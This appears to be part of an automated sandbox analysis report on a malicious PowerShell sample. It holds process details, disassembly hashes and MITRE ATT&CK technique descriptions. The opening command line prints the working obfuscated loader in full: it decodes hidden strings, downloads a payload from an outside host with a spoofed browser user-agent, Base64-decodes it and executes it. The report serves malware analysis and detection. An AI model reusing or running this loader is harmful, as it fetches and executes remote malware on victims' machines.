Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillFConsiMesolNosoeSm d(Sere$Dis,KSrkej ReaeLingrCoxcs lert Ae iStn nPa oeTr gsLyci,Cher$M tzSManou OinrDammeSklmfVulpo Skeo geltAce e Culd Hak)';$Surefooted=$Dryas;Batiker179 (Husking ' and$ Nong S.nl Indo De BErhvA I plOpst:MongBG,adlBrugyRe fiKrsen leidLad,fSpida PotTNo rtThadeSnu =Unma(fo,fTDispEFondS RectSkov- SkvPChucAM totQuotHRotc F ol$UdstsSko u farRAnanEDigiF A roPa.moHistTt eaE ontDFlas)');while (!$Blyindfatte) {Batiker179 (Husking 'Zwe $BluegEks,la,teoBrndbIngmaTilgl re:An.mT ppoa rarl uftoequ.m odrLadyaFortaVmmedO taeTraur ignnFrusePolisIdea=An c$PhreHFestdLivmr Take Unhdaaree') ;Batiker179 $karotiner;Batiker179 (Husking 'Fe,es Br tG inAS raR KvaTZinz-G nnsUninLc teeOptaEcurapGrim Kadm4');Batiker179 (Husking 'Sulp$Dia,GBryslslago Su,B Frya V oLTorr:BallBDe,aL UnsYDuctIProfnS lod BerFHookATrtttTrant GraeEft =Tras(Po,iTLinge RygSTilbTProg- WilpLseha udfTWaveHStra Sola$ParasAn mUSnohrPatreCheeFDatiomo lOSlapt.eliEFrosD Eft)') ;Batiker179 (Husking 'Nota$ RusGAl ol Spoo Preb hiA Ek lUnfl:Un,aP RekLSl hASkanN ScoaStorrRe p=Drif$ProcG Rinl PyrODecibSemiaPortLBunk: FurS OveODispP R iHB usiSpriS GentRokkiAn icTordaMetatMicrE,fte1Labo9Silu2Atom+Mist+Fron%Bodo$.ozzZSpejO IntlUnhoa AbaE BrosSlinqNonpuBusbeSi n.PlascDa doBruguKlepn d sT') ;$Kjerstines=$Zolaesque[$planar]}$Anskueliggrelserne=278059;$Amanori=31395;Batiker179 (Husking ' Ban$Br aG T klHydroBr lbNamdAAbieLOpal:De nITr nsHypoO HalLPholEMargRCh tiAnstnVit GTimoSTe raForsR ,laBDif EStjeJbes DTra,e rawRPistEHintSCarb7La d3Alth Fleg=Ma,m AuntG ReseLandTluni-adrtc TiloCe,lnAltsTFa.tE De,nSol.T igl An $Al,eS riduExhaRFor egar FBiinoTee OAlphtTjaveDamed');Batiker179 (Husking 'Unin$Indeg HollstoroTottbYderaTig l itt:ForgAlamsc olcVoluoSndeu Br,c SidhCry eKureu helsSt peSt esu.de Be.e=Inte Tje[ZoopS ugiy S vsHelitUrnieNj gm.ldt.F,ibC agvoCarnnKonvvAdeleKlinr Thet Bef]Non :Mini:r giFF errKontoJuthmD acBB,taa Fj.s ense Raa6Synk4UnisSNi otTelerLiceiBy on Forg ype(Sp,c$ProdIIndesMe.aoLevelCha eCornrPersi ,ronLodzg Co s,ortaHyp rLizeb Tone RewjB acd iereBuryrTripeS.rasRati7Chef3 .to)');Batiker179 (Husking 'Doct$Koncg.lerL LiloFotoBGaraafemaLWond:ka,aE.tilN BartDarwRStoreIn uc elvhTim AIntetIrresMagn Kag=Stru Forb[T,uts S lYLntiSRipotBuldEafdam Fot.Kultt Ar EAccoxIntetShor.Wee e QuanBroacOleaoPer D iuiFervnG usG Co ]S,kk:Ravi:AfflA FrisVagtc HypIBeleIMedi. sydG TraeU,detLithsTabetStreRNonni,iagNPhycg Ros(Dipl$SomeAAfskCTov CCir OTilduNeshCMe,aHRusse NatUDekasRe.eE.elaS on)');Batiker179 (Husking ',ejo$SemiGMeteLSkrpOSynebPortAPa olMili:TricutrosNgummtstilIBeatnSuppKtroleAut rWorteEmuedTran=Cirk$CataETetrN itttZ rar TroEHvemCHandhDuctAIdiotIncoSF sf.trakSThinU Zo B insBr,dTOpmrRBisaiSpecnStelG.tyr( rus$Vensa I.tN rls ,onKMel.uDy oeUdm L K,uiSt eGGdniGRad RP,rlECompL.orkSRetteThyeRUngenSolde S.e,I lu$SolgaStrumH ovA BudnFre O U dRgra.IBrne)');Batiker179 $Untinkered;"
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:42:21
Start date:	20/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFAAC1CA878 Relevance: 4.2, Strings: 3, Instructions: 436COMMON

Download Yara Rule

Strings

", xrefs: 00007FFAAC1CA852
6], xrefs: 00007FFAAC1CA9A7
6], xrefs: 00007FFAAC1CA957

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID: 6]$6]$"
API String ID: 0-3600914784
Opcode ID: dc977a31adc3c60cac22dbdd4b902d156e27e6634359e8ddbdeae81d4698a74b
Instruction ID: 99b1172acb4ca5e511ea16587658699fa7d3e061e1371ddd49db9fd7f7c283f3
Opcode Fuzzy Hash: dc977a31adc3c60cac22dbdd4b902d156e27e6634359e8ddbdeae81d4698a74b
Instruction Fuzzy Hash: 0CD13972A0DB498FF79BDB2C88556747BE1EF96220B0841BAE04DD7193DD25EC4A83C1

Function 00007FFAAC1C11AF Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

8h_, xrefs: 00007FFAAC1C11CB

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID: 8h_
API String ID: 0-383806709
Opcode ID: 366f0cb5fffd7d4eaac7d47bb1d84b15b8c2cc559451f872d5befe21c0f2a18c
Instruction ID: 34e2d012c2c555d8b9a330eedf99336cab2db0ce8c439309aa05efb5968e6eb0
Opcode Fuzzy Hash: 366f0cb5fffd7d4eaac7d47bb1d84b15b8c2cc559451f872d5befe21c0f2a18c
Instruction Fuzzy Hash: A021DE62A4F7C58FF357A77858A51A86BA1AF57210B2844BAE09DC70D3D81C9C898392

Function 00007FFAAC1C67A1 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 043971f4beaa53f6c441f975fe09849a7204c0e82395d2c8ff783bb007bc6ff9
Instruction ID: ca20d02946f8c3a06414ef0730e8d2b140ac9f6e4556664f5c2a2be7607ac926
Opcode Fuzzy Hash: 043971f4beaa53f6c441f975fe09849a7204c0e82395d2c8ff783bb007bc6ff9
Instruction Fuzzy Hash: 13C13766A0EB8A8FF797DB6888559B97BE1EF46310B4841BEE04DC7093D918DC49C3C1

Function 00007FFAAC1C3C79 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 596ef606ba7aad3f92d6db1c64cde5a3bbc53616156eee8f7448b5e80fba75fb
Instruction ID: 129665be030c5b2b07faef6806ec8491b64c06656318058a426524581f1ce215
Opcode Fuzzy Hash: 596ef606ba7aad3f92d6db1c64cde5a3bbc53616156eee8f7448b5e80fba75fb
Instruction Fuzzy Hash: 2481E662B0EB868FF79B972C58655B57BD1EF42250B8840BAE14EC30D3DD19EC4983C2

Function 00007FFAAC1C3CC0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0d78ab66db48ccd0d3bcb1c4503a4900008cfcf727b16496f1c8b82588d2a7d
Instruction ID: 4bc873cd9f2398a65a1c72f85c45bdde0d96da6119ed88043aa7e25a17bb9fb0
Opcode Fuzzy Hash: b0d78ab66db48ccd0d3bcb1c4503a4900008cfcf727b16496f1c8b82588d2a7d
Instruction Fuzzy Hash: 9A41C561A0E7895FF35B972C580A5B63BA1EF97710F4441EEF08DC71A3D9189C4A8392

Function 00007FFAAC1CABE3 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 859994cf2a2a1b88786eb884e3c526cc102cc7159cb6a7f2648691269afe7143
Instruction ID: 7e61e6d0c940d2e630cb00385eb24a40a404a13ec48c57641308bf2db0f73127
Opcode Fuzzy Hash: 859994cf2a2a1b88786eb884e3c526cc102cc7159cb6a7f2648691269afe7143
Instruction Fuzzy Hash: 1331C4A190F7C55FE35783385C155A47FA4EF93620B0981FBE08DCA4A3C9089C8AC3E6

Function 00007FFAAC1C3E04 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fe526a0adb62cf92caf938b421acf12501204d1f8fd648e3c43e54245270796
Instruction ID: 175b50bdceb6ee9921b46ff04fa6d4e448d79cdc21a96c9235c9f14127b5973e
Opcode Fuzzy Hash: 3fe526a0adb62cf92caf938b421acf12501204d1f8fd648e3c43e54245270796
Instruction Fuzzy Hash: 0C21E922B0EB4A8FF397A72C58555F567C2EF82250B9880B9F24DC7193DD19EC898381

Function 00007FFAAC1C1384 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804333effa984308baa725eb26136c3eb46a19a3ed27bc46170b68281d6b179d
Instruction ID: b779f23f429ecf2a771df7a16c6c99289a168b7eddc584df4914c308e4bf82dd
Opcode Fuzzy Hash: 804333effa984308baa725eb26136c3eb46a19a3ed27bc46170b68281d6b179d
Instruction Fuzzy Hash: AB110292A0F7C24FF253E77858550A86B91AF52224B2890FAE0ADC70D3D81C9C4C8392

Function 00007FFAAC1C6956 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de78e0ae495c6f63f5f0a9dd5c9efb16df245f9b3dbbc5ebdaeb17a8cf45db8
Instruction ID: 1b0c9bc19470e2fe93a950d16185dcd91369c9eb020553ecf65e2e9ae7e2062f
Opcode Fuzzy Hash: 7de78e0ae495c6f63f5f0a9dd5c9efb16df245f9b3dbbc5ebdaeb17a8cf45db8
Instruction Fuzzy Hash: F1110875B0EA8A8FF757DB588051678B7D1EF4A310F9841BEE04DC7183DD29E8898391

Function 00007FFAAC1CAC59 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e3db191023801c0f3456480ba6413841c323cbf9bce2dc4cc3b98ad92aa23fb
Instruction ID: e1f073b42a4bdc680846b2448db91a6e902c351aaf50a6f8248ca30b7853f31d
Opcode Fuzzy Hash: 6e3db191023801c0f3456480ba6413841c323cbf9bce2dc4cc3b98ad92aa23fb
Instruction Fuzzy Hash: D61173A454E7C69FE317873858155B4BF946F8772170AC2FBE08C4B5D3CA18988A83E6

Function 00007FFAAC0F3535 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1779848880.00007FFAAC0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC0F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac0f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: d310e2da2fa5e1191cd5ac747c00bc7474d38a84deb6ea5ccd24c8fde9aed16d
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 5D01447111CB088FDB48EF0CE451AA5B7E0FB95364F10056EE58AC3661DA26E891CB45

Function 00007FFAAC1C3FC5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1780222809.00007FFAAC1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC1C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac1c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5760fd6d1402b46513af7194111dd1e0dd03d011419305d1a2fbf6966b2311
Instruction ID: 02c5f24f6d89f99cb6284dbfb5f0b2346bf6d1e9eed75957d47cf0f1ddba5cfd
Opcode Fuzzy Hash: 6f5760fd6d1402b46513af7194111dd1e0dd03d011419305d1a2fbf6966b2311
Instruction Fuzzy Hash: 6301A221A0D7C45FD30797389C196A57FA2AF97740F1841EEE0C9CB1B3CA288C55C741

Non-executed Functions

Function 00007FFAAC0F53FA Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1779848880.00007FFAAC0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC0F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac0f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9068a991ca28ba9a95dcd115bce1c995e599c65d00b373a9de98e17bed872f85
Instruction ID: 611819f900e4ae5593b3bac7748ddc1c81b9eaff23f21cdbba1d2e21e5705b99
Opcode Fuzzy Hash: 9068a991ca28ba9a95dcd115bce1c995e599c65d00b373a9de98e17bed872f85
Instruction Fuzzy Hash: FB716347A1E7C28FF75353AC683A0E73FA0DE9726670942F3C0C886493E906545AD6E6

Function 00007FFAAC0F5252 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1779848880.00007FFAAC0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC0F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac0f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdefab9771d2eb20de861c6ad5e0ec403158b2f2558975dbf1f1ffadeb5f0d37
Instruction ID: a17a875529f2c4ec31f8066a454607ea77867cf0b5dcb3a3bb97150ce1af1590
Opcode Fuzzy Hash: cdefab9771d2eb20de861c6ad5e0ec403158b2f2558975dbf1f1ffadeb5f0d37
Instruction Fuzzy Hash: D051BD47A1E7C38FE357522C69750F73FA4DE8316670942F3C0C98A4939A06944AC6E6

Function 00007FFAAC0F02AD Relevance: 6.5, Strings: 5, Instructions: 265COMMON

Download Yara Rule

Strings

-z, xrefs: 00007FFAAC0F04F1
@Jz, xrefs: 00007FFAAC0F03A9
8,z, xrefs: 00007FFAAC0F04B1
P/z, xrefs: 00007FFAAC0F04A1
p0z, xrefs: 00007FFAAC0F0491

Memory Dump Source

Source File: 00000002.00000002.1779848880.00007FFAAC0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC0F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac0f0000_powershell.jbxd

Similarity

API ID:
String ID: 8,z$@Jz$P/z$p0z$-z
API String ID: 0-202195882
Opcode ID: dfab90766e144330b0e6dfd9dc1d87e3e69f3dded4ff1fa54d42d99b629995a2
Instruction ID: 8cb95f4130343161681dbfd311a210c95c464c92d1dd6278d80832b3b75045c8
Opcode Fuzzy Hash: dfab90766e144330b0e6dfd9dc1d87e3e69f3dded4ff1fa54d42d99b629995a2
Instruction Fuzzy Hash: 3281E68380FBC24FF35587A82C551396E95EFA3648B5880FBD0CC8A5D79A45ED9D83C2

Function 00007FFAAC0F044D Relevance: 6.3, Strings: 5, Instructions: 81COMMON

Download Yara Rule

Strings

-z, xrefs: 00007FFAAC0F04F1
8,z, xrefs: 00007FFAAC0F04B1
/z, xrefs: 00007FFAAC0F0469
P/z, xrefs: 00007FFAAC0F04A1
p0z, xrefs: 00007FFAAC0F0491

Memory Dump Source

Source File: 00000002.00000002.1779848880.00007FFAAC0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC0F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffaac0f0000_powershell.jbxd

Similarity

API ID:
String ID: 8,z$P/z$p0z$-z$/z
API String ID: 0-302463206
Opcode ID: 9ecc7ae2369167667030a536536a653f1a8bab16499379003f441e7fc5b4082b
Instruction ID: 594f053d065202da853202d5ddc8c01020025571bbf79ff0bfcdf064fbbc4e41
Opcode Fuzzy Hash: 9ecc7ae2369167667030a536536a653f1a8bab16499379003f441e7fc5b4082b
Instruction Fuzzy Hash: 0A21308380F7C14FF35687A81815139AE55AF53618B1C81FBE4CC8A5D79645ED9D83C2

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
